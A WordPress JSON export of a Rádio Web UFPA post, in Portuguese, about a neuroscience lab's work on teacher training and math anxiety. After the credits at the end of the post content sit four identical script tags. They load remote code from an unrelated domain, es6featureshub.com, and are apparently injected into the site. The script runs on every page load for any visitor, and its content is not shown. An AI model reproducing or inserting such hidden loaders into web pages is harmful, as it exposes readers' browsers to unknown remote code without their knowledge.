{"id":12703,"date":"2023-03-15T11:29:38","date_gmt":"2023-03-15T14:29:38","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=12703"},"modified":"2025-10-21T13:04:22","modified_gmt":"2025-10-21T16:04:22","slug":"neurociencias-educacao-e-matematica","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/","title":{"rendered":"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica"},"content":{"rendered":"\n<div class=\"rwc-audio-block\" class=\"wp-block-radioweb-rwcaudioblock\"><div class=\"rwc-audio-block-header\"><span class=\"dashicon dashicons dashicons-media-audio\"><\/span><div class=\"rwc-audio-block-description\"><p>&#8220;UFPA Ensino &#8211; Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica&#8221;<\/p><p class=\"category\">UFPA Ensino<\/p><p>R\u00e1dio Web UFPA<\/p><\/div><\/div><audio controls><source src=\"https:\/\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/UFPA-ENSINO-NEUROCIENCIA-EDUCACAO-E-MATEMATICA-15.03.23.mp3\" type=\"audio\/mpeg\"\/><\/audio><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema em destaque nesta edi\u00e7\u00e3o do <a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/ufpa-ensino\/\" target=\"_blank\" rel=\"noreferrer noopener\">UFPA Ensino<\/a>. No programa, a jornalista Elissandra Batista conversa sobre mente, c\u00e9rebro e educa\u00e7\u00e3o, com o professor Marcos Guilherme Moura, do Laborat\u00f3rio de Neuroci\u00eancias Aplicada ao Ensino de Ci\u00eancias, Matem\u00e1tica e Linguagem da UFPA (<a href=\"https:\/\/www.iemci.ufpa.br\/\" target=\"_blank\" rel=\"noreferrer noopener\">LAB- NEMCi<\/a>).<\/p>\n\n\n\n<p>De acordo com o professor, o Laborat\u00f3rio tem a miss\u00e3o de investigar temas relacionados a aprendizagem em ci\u00eancias, matem\u00e1tica e linguagem em uma perpectiva neurobiol\u00f3gica. \u201cAssim, a gente entende a aprendizagem n\u00e3o apenas no sentido cognitivo ou apenas no sentido comportamental, mas tenta integrar isso numa vis\u00e3o inclusive fisiol\u00f3gica. Ent\u00e3o, a aprendizagem \u00e9 vista na perspectiva do Laborat\u00f3rio no sentido comportamental, cognitivo e fisiol\u00f3gico\u201d. &nbsp;<\/p>\n\n\n\n<p>Marcos Guilherme Moura destaca ainda que o objetivo principal do LAB- NEMCi \u00e9 qualificar a forma\u00e7\u00e3o dos professores, para que possam compreender melhor os processos relacionados ao c\u00e9rebro humano. \u201cE por que isso \u00e9 importante? Porque \u00e9 curioso a gente pensar que o c\u00e9rebro \u00e9 onde acontece o processo de aprendizagem e dele esse professor ou esse futuro professor pouco compreenda. Ent\u00e3o, o foco do Laborat\u00f3rio \u00e9 qualificar a forma\u00e7\u00e3o dos nossos graduandos e promover um letramento neurocient\u00edfico entre os professores para que eles possam compreender melhor como se d\u00e1 o processo de aprendizagem no c\u00e9rebro e, naturalmente, construir pesquisas e fazer a integra\u00e7\u00e3o de ensino, pesquisa e extens\u00e3o\u201d.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>A partir de uma melhor compreens\u00e3o sobre o funcionamento do c\u00e9rebro no processo de aprendizagem, a expectativa \u00e9 elaborar e desenvolver estrat\u00e9gias que contribuam para o avan\u00e7o de did\u00e1ticas e metodologias que facilitem o ensino-aprendizado, sem os efeitos neurobiol\u00f3gicos observados no corpo humano, incluindo a ansiedade matem\u00e1tica, que, mesmo n\u00e3o significando dist\u00farbio ou transtorno, \u00e9 uma dificuldade de aprendizagem de cunho emocional que pode ser investigada a partir dos conhecimentos da neuroci\u00eancia. &nbsp;<\/p>\n\n\n\n<p>Ainda de acordo com Marcos Moura, infelizmente, 60% dos alunos, hoje, segundo as \u00faltimas pesquisas, sofrem de ansiedade matem\u00e1tica. Ou seja, existe de fato um pavor ou medo em rela\u00e7\u00e3o a essa disciplina. \u201cCrian\u00e7as com ansiedade matem\u00e1tica, geralmente tendem a ter um batimento mais complexo no cora\u00e7\u00e3o e isso pode ser observado no c\u00e9rebro, a partir, por exemplo, da am\u00edgdala, que est\u00e1 relacionada as nossas emo\u00e7\u00f5es, \u00e9 uma estrutura cerebral muito ligado ao medo. Ent\u00e3o, estudos da neuroci\u00eancia mostram que crian\u00e7as com alta ansiedade matem\u00e1tica que precisam resolver problemas, justamente essa regi\u00e3o do c\u00e9rebro, da am\u00edgdala, ela \u00e9 hiperativada\u201d. &nbsp;<\/p>\n\n\n\n<p>Considerando o quanto a ansiedade matem\u00e1tica impacta decisivamente na vida estudantil, da educa\u00e7\u00e3o infantil at\u00e9 a p\u00f3s-gradua\u00e7\u00e3o, o coordenador do LAB- NEMCi refor\u00e7a a import\u00e2ncia dos estudos na \u00e1rea. \u201cQuando a gente sabe que a matem\u00e1tica est\u00e1 diretamente relacionada ao desenvolvimento da ci\u00eancia e tecnologia de um pa\u00eds, discutir sobre essa dificuldade de aprendizagem se torna essencial, seja no \u00e2mbito da psicologia, que j\u00e1 possui muitos estudos de car\u00e1ter comportamental em rela\u00e7\u00e3o a ansiedade matem\u00e1tica, como tamb\u00e9m em uma perspectiva fisiol\u00f3gica, biol\u00f3gica que a\u00ed a neuroci\u00eancia tem seu grau de contribui\u00e7\u00e3o\u201d.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>No UFPA Ensino sobre Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica, voc\u00ea tamb\u00e9m confere os desafios para o avan\u00e7o das pesquisas em neuroci\u00eancia na Amaz\u00f4nia, os benef\u00edcios da pr\u00e1tica de exerc\u00edcios f\u00edsicos no desempenho escolar, em especial em rela\u00e7\u00e3o a matem\u00e1tica. Para que a disciplina n\u00e3o cause transtornos aos estudantes, ainda s\u00e3o necess\u00e1rias estrat\u00e9gias que superem os estigmas e deixem o aprendizado mais acess\u00edvel e sem gatilhos para a ansiedade.<\/p>\n\n\n\n<p>Produ\u00e7\u00e3o e reportagem: L\u00edvia Leoni<\/p>\n\n\n\n<p>Grava\u00e7\u00e3o e montagem: Denize Ramos e Jo\u00e3o Nilo<\/p>\n\n\n\n<p>Apresenta\u00e7\u00e3o, supervis\u00e3o e edi\u00e7\u00e3o: Elissandra Batista   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\" aria-label=\"Read more about Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":12747,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[41],"tags":[],"class_list":["post-12703","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-ensino"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema do UFPA Ensino, sobre o Laborat\u00f3rio de Neuroci\u00eancias Aplicada da UFPA.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema do UFPA Ensino, sobre o Laborat\u00f3rio de Neuroci\u00eancias Aplicada da UFPA.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2023-03-15T14:29:38+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:04:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica\",\"datePublished\":\"2023-03-15T14:29:38+00:00\",\"dateModified\":\"2025-10-21T16:04:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\"},\"wordCount\":701,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1\",\"articleSection\":[\"UFPA Ensino\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\",\"name\":\"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1\",\"datePublished\":\"2023-03-15T14:29:38+00:00\",\"dateModified\":\"2025-10-21T16:04:22+00:00\",\"description\":\"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema do UFPA Ensino, sobre o Laborat\u00f3rio de Neuroci\u00eancias Aplicada da UFPA.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1\",\"width\":600,\"height\":300,\"caption\":\"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica - Radio Web UFPA","description":"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema do UFPA Ensino, sobre o Laborat\u00f3rio de Neuroci\u00eancias Aplicada da UFPA.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/","og_locale":"pt_BR","og_type":"article","og_title":"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica - Radio Web UFPA","og_description":"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema do UFPA Ensino, sobre o Laborat\u00f3rio de Neuroci\u00eancias Aplicada da UFPA.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2023-03-15T14:29:38+00:00","article_modified_time":"2025-10-21T16:04:22+00:00","og_image":[{"width":600,"height":300,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica","datePublished":"2023-03-15T14:29:38+00:00","dateModified":"2025-10-21T16:04:22+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/"},"wordCount":701,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1","articleSection":["UFPA Ensino"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/","name":"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1","datePublished":"2023-03-15T14:29:38+00:00","dateModified":"2025-10-21T16:04:22+00:00","description":"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica \u00e9 o tema do UFPA Ensino, sobre o Laborat\u00f3rio de Neuroci\u00eancias Aplicada da UFPA.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1","width":600,"height":300,"caption":"Neuroci\u00eancia, Educa\u00e7\u00e3o e Matem\u00e1tica"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-ensino\/neurociencias-educacao-e-matematica\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Neuroci\u00eancia Educa\u00e7\u00e3o e Matem\u00e1tica"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2023\/03\/1595629469414.jpg?fit=600%2C300&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-3iT","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=12703"}],"version-history":[{"count":18,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12703\/revisions"}],"predecessor-version":[{"id":17817,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/12703\/revisions\/17817"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/12747"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=12703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=12703"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=12703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}